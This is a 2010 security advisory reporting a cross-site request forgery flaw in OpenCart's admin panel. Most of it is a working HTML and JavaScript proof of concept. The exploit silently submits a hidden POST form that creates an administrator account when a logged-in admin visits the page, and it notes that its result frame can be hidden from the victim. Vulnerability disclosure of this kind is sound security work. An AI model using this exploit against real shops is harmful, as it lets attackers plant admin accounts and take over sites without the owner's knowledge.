Advisory Information: Title: OpenCart CSRF Vulnerability Advisory URL: http://blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/ Date published: 2010-01-28 Vendors contacted: OpenCart Security Risk: High Vulnerability Description: OpenCart is vulnerable to CSRF attacks using the POST method. It is possible to craft a malicious page that will create an administrator user when the victim, who is logged into OpenCart, visits the malicious page. Proofs of Concept: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>OpenCart CSRF Vulnerability</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <script type="text/javascript"> function csrfInjection() { var params = { 'username' : 'an_attacker', 'firstname' : 'attack', 'lastname' : 'user', 'email' : 'some.user@xxxxxxxxxxxxxxxxxxxxxxx', 'user_group_id' : '1', //Default group id for administrator level is 1 'password' : 'test', 'confirm' : 'test', 'status' : '1' }; var form = document.createElement("form"); form.setAttribute("method", "post"); form.setAttribute("action", document.getElementById('site_url').value + "/index.php?route=user/user/insert"); for(var key in params) { var hiddenField = document.createElement("input"); hiddenField.setAttribute("type", "hidden"); hiddenField.setAttribute("name", key); hiddenField.setAttribute("value", params[key]); form.appendChild(hiddenField); } attack_result.document.body.appendChild(form); form.submit(); } </script> </head> <body> OpenCart CSRF Vulnerability <input type="text" name="site_url" id="site_url" size="50" />/index.php?route=user/user/insert<br /> <a href="#" onclick="csrfInjection();return false;">Add User</a> <p>Results: (this frame can be hidden so the user never knows the attack was performed)</p> <iframe id="attack_result" name="attack_result" width="600" height="600"></iframe> </body> </html>
